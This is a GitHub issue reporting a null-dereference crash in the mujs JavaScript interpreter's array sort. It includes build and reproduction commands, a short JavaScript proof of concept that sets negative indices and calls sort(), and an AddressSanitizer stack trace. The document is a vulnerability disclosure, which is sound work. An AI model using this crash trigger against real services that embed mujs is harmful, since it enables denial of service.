Skip to content

Bug: AddressSanitizer SEGV in Ap_sort_cmp due to null dereference during array sort #211

New issue
New issue
Open
Open
Bug: AddressSanitizer SEGV in Ap_sort_cmp due to null dereference during array sort#211
@zchengchen

Description

@zchengchen
zchengchen
opened on Jul 14, 2025

We find a potential vulnerability in the latest version of mujs.

Environment

zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ gcc --version
gcc (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0
Copyright (C) 2023 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ cat /etc/os-release
PRETTY_NAME="Ubuntu 24.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04.2 LTS (Noble Numbat)"
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=noble
LOGO=ubuntu-logo

Reproduction

zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ git clone https://github.com/ccxvii/mujs.git ~/FuzzDriverGen/findreal/mujs
Cloning into '/home/zhicheng/FuzzDriverGen/findreal/mujs'...
remote: Enumerating objects: 3587, done.
remote: Counting objects: 100% (707/707), done.
remote: Compressing objects: 100% (182/182), done.
remote: Total 3587 (delta 570), reused 529 (delta 525), pack-reused 2880 (from 3)
Receiving objects: 100% (3587/3587), 1.06 MiB | 738.00 KiB/s, done.
Resolving deltas: 100% (2649/2649), done.
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ cd ~/FuzzDriverGen/findreal/mujs
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ git rev-parse HEAD
05cd646bad083ed45e9e1c9846ea671d461ced30
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ sed -i 's/CFLAGS = -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter/CFLAGS = -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter -fsanitize=address/' Makefile
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ make
curl -s -o UnicodeData.txt https://www.unicode.org/Public/16.0.0/ucd/UnicodeData.txt
curl -s -o SpecialCasing.txt https://www.unicode.org/Public/16.0.0/ucd/SpecialCasing.txt
python3 genucd.py UnicodeData.txt SpecialCasing.txt >utfdata.h
cc -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter -fsanitize=address -g -c -o build/debug/libmujs.o one.c
cc -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter -fsanitize=address -g -o build/debug/mujs main.c build/debug/libmujs.o -lm -DHAVE_READLINE -lreadline
cc -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter -fsanitize=address -g -o build/debug/mujs-pp pp.c build/debug/libmujs.o -lm
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ cat << EOF > poc
var crash = new Array(3);    

[-7, -42, -31337].forEach(function (idx) {
    crash[idx] = idx * 2 + 1;
});

crash.sort();
EOF
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ ./build/debug/mujs poc
AddressSanitizer:DEADLYSIGNAL
=================================================================
==23738==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000002f (pc 0x5f0245384fe8 bp 0x7ffd00e23e60 sp 0x7ffd00e23de0 T0)
==23738==The signal is caused by a READ memory access.
==23738==Hint: address points to the zero page.
    #0 0x5f0245384fe8 in Ap_sort_cmp /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:246
    #1 0x5f02453858c9 in Ap_sort_leaf /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:357
    #2 0x5f0245385936 in Ap_sort_sift /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:371
    #3 0x5f02453859c6 in Ap_sort_heapsort /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:384
    #4 0x5f0245385ad5 in Ap_sort /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:407
    #5 0x5f02453cae1a in jsR_callcfunction /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1249
    #6 0x5f02453cb931 in js_call /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1299
    #7 0x5f02453d04a1 in jsR_run /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1810
    #8 0x5f02453cab67 in jsR_callscript /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1230
    #9 0x5f02453cb7e6 in js_call /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1295
    #10 0x5f02453d2fe6 in js_dofile /home/zhicheng/FuzzDriverGen/findreal/mujs/jsstate.c:249
    #11 0x5f0245384144 in main /home/zhicheng/FuzzDriverGen/findreal/mujs/main.c:363
    #12 0x7ecd5942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #13 0x7ecd5942a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #14 0x5f0245382b24 in _start (/home/zhicheng/FuzzDriverGen/findreal/mujs/build/debug/mujs+0x12b24) (BuildId: 151666f3e93596a8651c122b73d85c3ac6691864)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:246 in Ap_sort_cmp
==23738==ABORTING

PoC

var crash = new Array(3);    

[-7, -42, -31337].forEach(function (idx) {
    crash[idx] = idx * 2 + 1;
});

crash.sort();

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions